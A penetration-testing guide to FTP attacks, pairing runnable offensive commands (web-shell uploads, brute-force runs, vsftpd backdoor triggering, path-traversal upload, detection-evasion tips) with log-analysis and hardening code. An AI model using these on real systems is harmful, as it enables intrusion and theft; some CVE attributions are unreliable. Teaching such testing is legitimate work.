FTP Service Attacks and Exploitation
Complete guide to FTP service exploitation including anonymous authentication, brute-force attacks, FTP bounce attacks, and modern FTP vulnerabilities.
Introduction
The File Transfer Protocol (FTP) is a standard network protocol used for transferring files between a client and server over a TCP-based network. Despite being one of the oldest application-layer protocols (originally specified in 1971), FTP remains widely deployed in corporate environments, web hosting platforms, and embedded systems.
FTP's inherent security weaknesses make it an attractive target for penetration testers and attackers:
- Plain-text authentication: Credentials transmitted without encryption
- Clear-text data transfer: File contents visible to network sniffers
- Anonymous access: Frequently misconfigured to allow unauthenticated access
- Weak access controls: Directory permissions often improperly configured
- Protocol design flaws: FTP bounce attacks and command injection vectors
Why FTP Remains Relevant in Security Assessments
Despite widespread availability of secure alternatives (SFTP, FTPS, SCP), FTP persists due to:
- Legacy system requirements: Older applications and devices require FTP
- Ease of deployment: Simple setup without certificate management
- Embedded device defaults: IoT and network equipment ship with FTP enabled
- Anonymous file sharing: Organizations use FTP for public file distribution
- Integration dependencies: Custom applications built around FTP APIs
FTP vulnerabilities frequently appear in penetration testing engagements, with anonymous access and weak credentials being common findings.
Technical Background
FTP Protocol Overview
FTP operates on a client-server model using two separate connections:
Control Connection (Command Channel):
- Port: TCP/21 (default)
- Purpose: Authentication, commands, responses
- Protocol: ASCII text-based
- Lifetime: Persistent throughout session
Data Connection (Data Channel):
- Ports: TCP/20 (active mode) or ephemeral high ports (passive mode)
- Purpose: File transfers, directory listings
- Lifetime: Established per-operation, then closed
FTP Modes
Active Mode (PORT):
- Client opens random high port and sends PORT command with IP:Port
- Server initiates data connection from port 20 to client's specified port
- Problem: Blocked by client-side firewalls (inbound connection)
Passive Mode (PASV):
- Client sends PASV command
- Server opens random high port and returns IP:Port
- Client initiates data connection to server's specified port
- Advantage: Works through client-side firewalls
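Both PORT and the 227 reply to PASV carry the data-channel endpoint as six comma-separated decimal bytes (h1,h2,h3,h4,p1,p2, port = p1*256 + p2). The following is an added example, not code from the original page: it decodes and encodes that form and implements the server-side sanity check RFC 2577 recommends, which is what stops PORT from being abused as a proxy (the data connection should go back to the host holding the control connection, on an unprivileged port). Sample addresses are constructed.

```python
import ipaddress
import re

# Matches the h1,h2,h3,h4,p1,p2 tuple inside a PORT argument or a
# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)." reply.
_HOSTPORT_RE = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def decode_hostport(text: str) -> tuple[str, int]:
    """Decode the FTP host/port tuple into (dotted_ip, tcp_port)."""
    m = _HOSTPORT_RE.search(text)
    if not m:
        raise ValueError(f"no h1,h2,h3,h4,p1,p2 tuple in {text!r}")
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        raise ValueError("tuple field exceeds 255")
    h1, h2, h3, h4, p1, p2 = fields
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def encode_hostport(ip: str, port: int) -> str:
    """Inverse of decode_hostport: build the argument a client would send in PORT."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range")
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ",".join(octets + [str(port // 256), str(port % 256)])


def port_command_is_suspicious(control_peer_ip: str, port_argument: str) -> tuple[bool, str]:
    """Server-side check on a received PORT command (RFC 2577 guidance):
    refuse data connections to a host other than the control-connection peer
    (the bounce pattern) and to privileged ports. Returns (suspicious, reason)."""
    ip, port = decode_hostport(port_argument)
    if ip != control_peer_ip:
        return True, f"PORT host {ip} differs from control peer {control_peer_ip} (bounce indicator)"
    if port < 1024:
        return True, f"PORT targets privileged port {port}"
    return False, "ok"


if __name__ == "__main__":
    # Constructed values: a PORT aimed at an internal host while the client is elsewhere.
    print(decode_hostport("PORT 172,17,0,2,0,80"))
    print(port_command_is_suspicious("203.0.113.7", "172,17,0,2,0,80"))
```

The same decoder applies to the manual bounce example later on this page: `PORT 172,17,0,2,0,80` decodes to 172.17.0.2:80, and the host mismatch against the control peer is exactly the condition a hardened server rejects and a log monitor should alert on.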
FTP Commands
Common FTP commands relevant to security testing:
| Command | Purpose | Security Implications |
|---|---|---|
| USER | Username authentication | Transmitted in clear text |
| PASS | Password authentication | Transmitted in clear text |
| LIST | Directory listing | Reveals file structure |
| RETR | Download file | Exfiltration vector |
| STOR | Upload file | Web shell upload potential |
| DELE | Delete file | Denial of service / cleanup |
| MKD | Create directory | May bypass restrictions |
| RMD | Remove directory | Destructive capability |
| PORT | Active mode data connection | FTP bounce attack vector |
| PASV | Passive mode data connection | Firewall evasion |
| SYST | System information | Version disclosure |
| STAT | Server status | Information disclosure |
| HELP | Available commands | Feature enumeration |
Enumeration
Nmap Service Detection
Use Nmap to identify FTP services and check for anonymous access:
# Basic FTP detection
nmap -p 21 -sV -sC 10.10.11.45
# Comprehensive FTP script scan
nmap -p 21 -sV --script=ftp-* 10.10.11.45
# Target multiple FTP ports
nmap -p 21,2121,990,8021 -sV -sC 10.10.11.0/24
Useful Nmap NSE Scripts:
- ftp-anon: Checks for anonymous FTP login
- ftp-bounce: Tests for FTP bounce vulnerability
- ftp-libopie: Checks for libopie buffer overflow
- ftp-proftpd-backdoor: Detects ProFTPD 1.3.3c backdoor
- ftp-vsftpd-backdoor: Detects vsftpd 2.3.4 backdoor
- ftp-vuln-cve2010-4221: Tests for ProFTPD SQL injection
Example Output
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1170 924 31 Mar 28 2001 .banner
| d--x--x--x 2 root root 1024 Jan 14 2002 bin
| d--x--x--x 2 root root 1024 Aug 10 1999 etc
| drwxr-srwt 2 1170 924 2048 Jul 19 18:48 incoming [NSE: writeable]
|_Only 5 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
Service Info: OS: Unix
Manual Enumeration
Connect directly to enumerate service information:
# Using FTP client
ftp 10.10.11.45
# Using Netcat (raw commands)
nc 10.10.11.45 21
# Using Telnet
telnet 10.10.11.45 21
Banner Grabbing:
# Extract version information
echo "QUIT" | nc 10.10.11.45 21
# Example banner
220 (vsFTPd 3.0.3)
220 ProFTPD 1.3.5 Server
220 Microsoft FTP Service
Exploitation Techniques
Anonymous Authentication
Anonymous FTP access is a common misconfiguration that allows unauthenticated users to browse and potentially upload files.
Test Anonymous Login
Attempt authentication with common anonymous credentials:
# Using FTP client
ftp 10.10.11.45
# Username: anonymous
# Password: anonymous (or blank)
# Automated connection
ftp -A 10.10.11.45
# Using wget for recursive download
wget -r ftp://anonymous:anonymous@10.10.11.45/
# Using curl
curl -u anonymous:anonymous ftp://10.10.11.45/ --list-only
Common Anonymous Credentials:
- Username: anonymous, Password: anonymous
- Username: anonymous, Password: guest
- Username: anonymous, Password: (blank)
- Username: ftp, Password: ftp
Enumerate Accessible Directories
Once connected, explore the file system:
ftp> ls -la
ftp> cd pub
ftp> pwd
ftp> dir -R
# Check for writable directories
ftp> cd incoming
ftp> mkdir test
ftp> rmdir test
High-Value Target Directories:
- /home/ - User home directories
- /var/www/ - Web server document root
- /backup/ - Database and configuration backups
- /config/ - Application configurations
- /incoming/ - Often world-writable
- /pub/ - Public file sharing
Download Sensitive Files
Retrieve potentially sensitive information:
# Single file download
ftp> get passwords.txt
ftp> get backup.zip
ftp> get id_rsa
# Binary mode for non-text files
ftp> binary
ftp> get database_backup.sql.gz
# ASCII mode for text files
ftp> ascii
ftp> get .bash_history
# Multiple file download
ftp> mget *.txt
ftp> mget *.conf
Recursive Download with wget:
wget -r --no-passive ftp://anonymous:anonymous@10.10.11.45/
Test Upload Capability
If write access exists, test file upload:
# Create test file
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
# Upload to FTP
ftp> put shell.php
ftp> put backdoor.aspx
ftp> put test.html
# Verify upload
ftp> ls -la
# Multiple file upload
ftp> mput *.php
Web Shell Upload Scenario:
- Identify web-accessible FTP directory
- Upload web shell (PHP, ASP, ASPX, JSP)
- Access via HTTP:
http://10.10.11.45/shell.php?cmd=whoami
Brute Force Attacks
When anonymous access is disabled, credential brute-forcing may be necessary.
Using Hydra
# Single username attack
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.11.45
# User list and password list
hydra -L users.txt -P passwords.txt ftp://10.10.11.45
# With specific port
hydra -l fiona -P /usr/share/wordlists/rockyou.txt ftp://10.10.11.45:2121
# Verbose output
hydra -l admin -P passwords.txt -V ftp://10.10.11.45
# Faster threads (be careful - may trigger IDS)
hydra -l admin -P passwords.txt -t 16 ftp://10.10.11.45
Using Medusa
# Basic brute force
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 10.10.11.45 -M ftp
# Multiple users
medusa -U users.txt -P passwords.txt -h 10.10.11.45 -M ftp
# Stop after first valid credentials
medusa -u admin -P passwords.txt -h 10.10.11.45 -M ftp -f
# Verbose mode
medusa -u admin -P passwords.txt -h 10.10.11.45 -M ftp -v 6
Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/ftp/ftp_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ftp/ftp_login) > run
Password Spraying vs Brute Force
Modern FTP servers often implement account lockout policies. Password spraying (testing one password across many accounts) is more effective and stealthy than brute-forcing (testing many passwords against one account).
Recommended Approach:
- Enumerate valid usernames first
- Test a small list of common passwords
- Wait between attempts to avoid detection
- Use VPN/proxy rotation for distributed attacks
FTP Bounce Attack
The FTP bounce attack exploits the PORT command to abuse an FTP server as a proxy for port scanning or attacking internal systems.
Attack Concept
- Attacker connects to vulnerable FTP server (FTP_DMZ)
- Attacker sends PORT command specifying internal target IP and port
- FTP server initiates connection to internal target
- Attacker observes connection success/failure for port scanning
Using Nmap
# Basic FTP bounce scan
nmap -Pn -v -n -p 80,443,445,3389 -b anonymous:anonymous@10.10.11.45 172.17.0.2
# Scan entire subnet through FTP
nmap -Pn -p 22,80,443 -b ftp:<password>@10.10.11.45 192.168.1.0/24
# Comprehensive port scan
nmap -Pn -sV -p- -b anonymous:@10.10.11.45 10.10.10.5
Limitations:
- Modern FTP servers block by default
- Requires anonymous or compromised FTP credentials
- Slow compared to direct scanning
- Easily logged and detected
Manual FTP Bounce
ftp 10.10.11.45
ftp> PORT 172,17,0,2,0,80
200 PORT command successful
ftp> LIST
If the connection succeeds, the port is open on the target; if it fails, the port is closed or filtered.
Common FTP Vulnerabilities
vsftpd 2.3.4 Backdoor (CVE-2011-2523)
# Using Metasploit
msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.11.45
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
# Manual exploitation
nc 10.10.11.45 21
USER backdoored:)
PASS anything
# Backdoor shell opens on port 6200
nc 10.10.11.45 6200
ProFTPD 1.3.3c Backdoor (CVE-2010-4221)
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 10.10.11.45
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
CoreFTP Path Traversal (CVE-2022-22836)
Allows authenticated users to write files outside restricted directories.
# Create malicious payload
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Exploit path traversal
curl -k -X PUT -H "Host: 10.10.11.45" \
--basic -u admin:password123 \
--data-binary @shell.php \
--path-as-is \
https://10.10.11.45/../../../../../../inetpub/wwwroot/shell.php
# Verify upload
curl http://10.10.11.45/shell.php?cmd=whoami
Post-Exploitation
File Transfer Modes
Understanding FTP transfer modes is critical for successful exploitation:
Binary Mode
Use for:
- Executables (.exe, .dll, .so)
- Compressed files (.zip, .gz, .tar)
- Images (.jpg, .png, .gif)
- Database files
ftp> binary
200 Switching to Binary mode.
ftp> put payload.exe
ftp> get backup.tar.gz
ASCII Mode
Use for:
- Text files (.txt, .log, .conf)
- Scripts (.sh, .ps1, .py)
- Source code (.c, .php, .asp)
- Configuration files
ftp> ascii
200 Switching to ASCII mode.
ftp> put shell.php
ftp> get passwords.txt
File Corruption Warning
Uploading binary files in ASCII mode corrupts them due to line-ending conversions. Always verify transfer mode before uploading executables or payloads.
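To make the corruption mechanism concrete, here is an added example (not from the original page) that models the sender side of an ASCII-mode transfer from a Unix host, where every LF is sent as CRLF and a Windows receiver stores it that way, and pairs it with the check a practitioner should run after any transfer: compare a digest of the local file with a digest of what the remote side stored. The byte samples are constructed.

```python
import hashlib


def ascii_mode_to_wire(data: bytes) -> bytes:
    """TYPE A from a Unix sender: FTP's ASCII representation uses CRLF line
    endings, so each 0x0A becomes 0x0D 0x0A. Harmless for text, destructive
    for any binary that happens to contain 0x0A bytes."""
    return data.replace(b"\n", b"\r\n")


def binary_mode_to_wire(data: bytes) -> bytes:
    """TYPE I: the byte stream passes through unchanged."""
    return data


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def transfer_intact(sent: bytes, stored: bytes) -> bool:
    """Integrity check to run after a transfer: hash the local copy and the
    remote copy (e.g. by re-downloading it in binary mode) and compare."""
    return sha256_hex(sent) == sha256_hex(stored)


def compare_modes(data: bytes) -> dict:
    """Report whether each transfer mode preserves the payload and how many
    bytes ASCII mode adds (one per 0x0A in the input)."""
    ascii_copy = ascii_mode_to_wire(data)
    return {
        "binary_intact": transfer_intact(data, binary_mode_to_wire(data)),
        "ascii_intact": transfer_intact(data, ascii_copy),
        "ascii_growth": len(ascii_copy) - len(data),
    }


# Constructed sample: a fake executable header containing two 0x0A bytes.
BINARY_SAMPLE = bytes([0x4D, 0x5A, 0x90, 0x00, 0x0A, 0x00, 0x00, 0x0A, 0xFF, 0xFF])

if __name__ == "__main__":
    print(compare_modes(BINARY_SAMPLE))
```

Because the growth equals the number of 0x0A bytes, a size mismatch reported by SIZE after an upload is a quick first hint that the wrong mode was used; the digest comparison is the definitive check.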
Privilege Escalation via FTP
If FTP runs with elevated privileges, file upload can lead to privilege escalation:
Scenario 1: Web Shell Upload
- Anonymous FTP allows upload to web directory
- Upload PHP/ASP web shell
- Execute via HTTP to gain RCE
Scenario 2: Cron Job Manipulation
- FTP allows access to /etc/cron.d/ or /var/spool/cron/
- Upload malicious cron job
- Wait for scheduled execution as root
Scenario 3: SSH Key Injection
- FTP allows write to /home/user/.ssh/
- Upload attacker's public key to authorized_keys
- SSH as user with key-based authentication
Data Exfiltration
# Download entire directory structure
wget -r --no-passive ftp://admin:<password>@10.10.11.45/
# Mirror FTP server
lftp -e "mirror ; quit" ftp://admin:<password>@10.10.11.45/
# Selective download
lftp -c "open ftp://admin:<password>@10.10.11.45; mget *.sql; quit"
Detection and Defense
Monitoring for FTP Attacks
Event Indicators:
- Multiple failed login attempts (brute-force)
- Anonymous login followed by file uploads
- PORT commands with internal IP addresses (bounce attacks)
- File downloads of sensitive data
- Unusual connection times or source IPs
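The indicators above can be turned into detection logic. The following is an added example, not from the original page: it parses lines in vsftpd's default vsftpd.log style (timestamp, pid, user, OK/FAIL, action, client), then flags brute force (many failures against few accounts from one client), password spraying (failures spread over many accounts from one client), and anonymous logins followed by uploads from the same client. The log lines are constructed for the example; the threshold of five failures is an assumption to tune per environment.

```python
import re
from collections import Counter, defaultdict

# vsftpd's default log line layout (constructed sample below, not a real capture):
# Tue Mar 14 10:22:11 2023 [pid 1200] [admin] FAIL LOGIN: Client "10.10.10.5"
_LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<result>OK|FAIL)?\s*(?P<action>[A-Z]+): '
    r'Client "(?P<client>[^"]+)"(?:, "(?P<path>[^"]+)")?'
)

LOG_SAMPLE = """\
Tue Mar 14 10:22:10 2023 [pid 1201] CONNECT: Client "10.10.10.5"
Tue Mar 14 10:22:11 2023 [pid 1200] [admin] FAIL LOGIN: Client "10.10.10.5"
Tue Mar 14 10:22:12 2023 [pid 1200] [admin] FAIL LOGIN: Client "10.10.10.5"
Tue Mar 14 10:22:13 2023 [pid 1200] [admin] FAIL LOGIN: Client "10.10.10.5"
Tue Mar 14 10:22:14 2023 [pid 1200] [admin] FAIL LOGIN: Client "10.10.10.5"
Tue Mar 14 10:22:15 2023 [pid 1200] [admin] FAIL LOGIN: Client "10.10.10.5"
Tue Mar 14 10:22:16 2023 [pid 1200] [admin] FAIL LOGIN: Client "10.10.10.5"
Tue Mar 14 10:23:01 2023 [pid 1300] [anonymous] OK LOGIN: Client "10.10.10.9", anon password "anonymous"
Tue Mar 14 10:23:05 2023 [pid 1301] [ftp] OK UPLOAD: Client "10.10.10.9", "/incoming/shell.php", 31 bytes, 1.20Kbyte/sec
Tue Mar 14 10:24:00 2023 [pid 1400] [fiona] OK LOGIN: Client "10.10.10.20"
Tue Mar 14 10:24:03 2023 [pid 1401] [fiona] OK DOWNLOAD: Client "10.10.10.20", "/home/fiona/report.pdf", 10240 bytes, 80.00Kbyte/sec
Tue Mar 14 10:25:01 2023 [pid 1500] [admin] FAIL LOGIN: Client "10.10.10.30"
Tue Mar 14 10:25:02 2023 [pid 1500] [fiona] FAIL LOGIN: Client "10.10.10.30"
Tue Mar 14 10:25:03 2023 [pid 1500] [root] FAIL LOGIN: Client "10.10.10.30"
Tue Mar 14 10:25:04 2023 [pid 1500] [backup] FAIL LOGIN: Client "10.10.10.30"
Tue Mar 14 10:25:05 2023 [pid 1500] [www-data] FAIL LOGIN: Client "10.10.10.30"
"""


def parse_vsftpd_line(line: str):
    """Return a dict of fields for a recognised line, None for anything else."""
    m = _LINE_RE.match(line)
    return m.groupdict() if m else None


def parse_log(text: str) -> list:
    return [e for e in (parse_vsftpd_line(l) for l in text.splitlines()) if e]


def classify_login_failures(events: list, threshold: int = 5) -> dict:
    """Per client IP with at least `threshold` failures: ('brute-force' |
    'password-spray', failure count, sorted usernames tried)."""
    fails = Counter()
    users = defaultdict(set)
    for e in events:
        if e["action"] == "LOGIN" and e["result"] == "FAIL":
            fails[e["client"]] += 1
            users[e["client"]].add(e["user"])
    findings = {}
    for client, n in fails.items():
        if n < threshold:
            continue
        kind = "password-spray" if len(users[client]) >= threshold else "brute-force"
        findings[client] = (kind, n, sorted(users[client]))
    return findings


def anonymous_uploads(events: list) -> list:
    """(client, path) for uploads by clients that earlier logged in anonymously.
    Correlating on client IP avoids depending on how the server labels the
    anonymous user in later lines."""
    anon_clients = set()
    hits = []
    for e in events:
        if e["action"] == "LOGIN" and e["result"] == "OK" and e["user"] == "anonymous":
            anon_clients.add(e["client"])
        elif e["action"] == "UPLOAD" and e["result"] == "OK" and e["client"] in anon_clients:
            hits.append((e["client"], e["path"]))
    return hits


if __name__ == "__main__":
    events = parse_log(LOG_SAMPLE)
    print(classify_login_failures(events))
    print(anonymous_uploads(events))
```

Feeding the real file is a matter of `parse_log(open("/var/log/vsftpd.log").read())`; with `log_ftp_protocol=YES` the extra per-command lines simply fail the pattern and are ignored.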
Log Analysis:
# vsftpd logs
tail -f /var/log/vsftpd.log
# ProFTPD logs
tail -f /var/log/proftpd/proftpd.log
# Check for failed logins
grep "FAIL LOGIN" /var/log/vsftpd.log
# Detect brute force
grep "authentication failed" /var/log/proftpd/proftpd.log | cut -d' ' -f8 | sort | uniq -c | sort -n
Hardening FTP Services
Disable Anonymous Access
# vsftpd configuration (/etc/vsftpd.conf)
anonymous_enable=NO
# ProFTPD configuration (/etc/proftpd/proftpd.conf)
<Anonymous ~ftp>
User ftp
Group ftp
UserAlias anonymous ftp
# Comment out entire block or disable
</Anonymous>
Implement Strong Authentication
- Enforce strong password policies (15+ characters, complexity)
- Use public key authentication where supported
- Implement two-factor authentication (e.g., Google Authenticator)
- Regularly audit and disable inactive accounts
Restrict Network Access
# iptables firewall rules
iptables -A INPUT -p tcp --dport 21 -s 10.10.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j DROP
# vsftpd TCP wrappers
# /etc/hosts.allow
vsftpd: 10.10.10.0/24
# /etc/hosts.deny
vsftpd: ALL
Configure Chroot Jails
Prevent directory traversal by jailing users:
# vsftpd
chroot_local_user=YES
chroot_list_enable=NO
# ProFTPD
DefaultRoot ~
Enable Logging and Monitoring
# vsftpd extensive logging
log_ftp_protocol=YES
xferlog_enable=YES
xferlog_file=/var/log/vsftpd.log
# ProFTPD detailed logging
SystemLog /var/log/proftpd/proftpd.log
TransferLog /var/log/proftpd/xferlog
Disable Dangerous Commands
# vsftpd - disable ABOR, DELE, RNFR, RNTO, STOR, STOU
cmds_allowed=FEAT,REST,CWD,LIST,MDTM,MKD,NLST,PASS,PASV,PORT,PWD,QUIT,RETR,SIZE,TYPE,USER
# ProFTPD
<Limit SITE_CHMOD>
DenyAll
</Limit>
<Limit DELE RMD>
DenyAll
</Limit>
Migrate to Secure Alternatives
SFTP (SSH File Transfer Protocol):
- Encrypted authentication and data transfer
- Piggybacks on SSH (port 22)
- Strong cryptographic protection
FTPS (FTP Secure):
- FTP with TLS/SSL encryption
- Explicit (FTPES) or Implicit (FTPS) modes
- Certificate-based authentication available
SCP (Secure Copy Protocol):
- SSH-based file transfer
- Simple, secure, encrypted
- No interactive session required
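Pulling the vsftpd directives from the hardening section together, here is an added example (not from the original page or the vsftpd project) that audits a vsftpd.conf against that baseline: anonymous access disabled, users jailed, protocol and transfer logging on, and none of the write, rename or delete verbs the page's cmds_allowed example leaves out. It also checks ssl_enable for FTPS, since plain FTP sends USER/PASS in clear text, and flags anon_upload_enable / anon_mkdir_write_enable whenever anonymous access is still on. Both configuration samples are constructed.

```python
# Directive values the hardening guidance above treats as correct.
EXPECTED = {
    "anonymous_enable": "NO",
    "chroot_local_user": "YES",
    "chroot_list_enable": "NO",
    "log_ftp_protocol": "YES",
    "xferlog_enable": "YES",
    "ssl_enable": "YES",  # FTPS; without it credentials cross the wire in clear text
}

# Verbs the cmds_allowed example deliberately omits.
WRITE_VERBS = {"ABOR", "DELE", "RNFR", "RNTO", "STOR", "STOU"}

# Constructed samples: a weak file and one matching the baseline.
WEAK_CONF = """\
# constructed vsftpd.conf with common weaknesses
listen=YES
anonymous_enable=YES
anon_upload_enable=YES
write_enable=YES
local_enable=YES
xferlog_enable=NO
cmds_allowed=USER,PASS,PASV,PORT,LIST,RETR,STOR,DELE,QUIT
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
chroot_local_user=YES
chroot_list_enable=NO
log_ftp_protocol=YES
xferlog_enable=YES
xferlog_file=/var/log/vsftpd.log
ssl_enable=YES
cmds_allowed=FEAT,REST,CWD,LIST,MDTM,MKD,NLST,PASS,PASV,PORT,PWD,QUIT,RETR,SIZE,TYPE,USER
"""


def parse_vsftpd_conf(text: str) -> dict:
    """vsftpd.conf holds one key=value per line; lines beginning with # are
    comments and inline comments are not allowed, so a # inside a value stays."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def audit_vsftpd_conf(text: str) -> list:
    """Return (directive, observed, note) for each deviation from the baseline;
    an empty list means the file matches it."""
    s = parse_vsftpd_conf(text)
    findings = []
    for key, want in EXPECTED.items():
        have = s.get(key)
        if have is None:
            findings.append((key, "(unset)", f"set explicitly to {want}"))
        elif have.upper() != want:
            findings.append((key, have, f"expected {want}"))
    # Anonymous write access is only a concern while anonymous login is possible.
    if s.get("anonymous_enable", "").upper() != "NO":
        for key in ("anon_upload_enable", "anon_mkdir_write_enable"):
            if s.get(key, "NO").upper() == "YES":
                findings.append((key, "YES", "anonymous users can write to the server"))
    allowed = {v.strip().upper() for v in s.get("cmds_allowed", "").split(",") if v.strip()}
    exposed = sorted(allowed & WRITE_VERBS)
    if exposed:
        findings.append(("cmds_allowed", ",".join(exposed), "write/rename/delete verbs still permitted"))
    return findings


if __name__ == "__main__":
    for finding in audit_vsftpd_conf(WEAK_CONF):
        print("%-24s %-10s %s" % finding)
    print("hardened findings:", audit_vsftpd_conf(HARDENED_CONF))
```

Run it against the live file with `audit_vsftpd_conf(open("/etc/vsftpd.conf").read())`; a directive reported as unset is worth pinning explicitly rather than relying on the build's compiled-in default.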